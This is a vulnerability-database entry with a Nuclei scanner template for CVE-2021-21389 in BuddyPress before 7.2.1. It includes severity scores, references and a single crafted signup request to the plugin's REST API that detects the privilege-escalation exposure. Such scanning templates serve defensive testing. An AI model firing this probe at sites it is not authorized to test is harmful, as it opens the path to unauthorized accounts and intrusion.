Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-21389
HistoryJun 21, 2021 - 5:33 a.m.

BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution

2021-06-2105:33:14
ProjectDiscovery
github.com
21
cve-2021
wordpress
plugin
remote code execution
buddypress

CVSS2

9

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.824

Percentile

98.5%

WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.

id: CVE-2021-21389

info:
  name: BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution
  author: lotusdll
  severity: high
  description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.
  remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
  reference:
    - https://github.com/HoangKien1020/CVE-2021-21389
    - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
    - https://codex.buddypress.org/releases/version-7-2-1/
    - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-21389
    cwe-id: CWE-863
    epss-score: 0.83143
    epss-percentile: 0.98426
    cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: buddypress
    product: buddypress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress

http:
  - raw:
      - |
        POST /wp-json/buddypress/v1/signup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {
          "user_login":"{{randstr}}",
          "password":"{{randstr}}",
          "user_name":"{{randstr}}",
          "user_email":"{{randstr}}@interact.sh"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "user_login"
          - "registered"
          - "activation_key"
          - "user_email"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100885cd6ea86ca04ca6daedbe83a0849b14dec28669707ea627bc4c28c09150aec022100c2c529caacdd52e2f407a4f5b40faa2511d55958f6151f7b0de27832361574bf:922c64590222798bb761d5b6d8e72950

CVSS2

9

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.824

Percentile

98.5%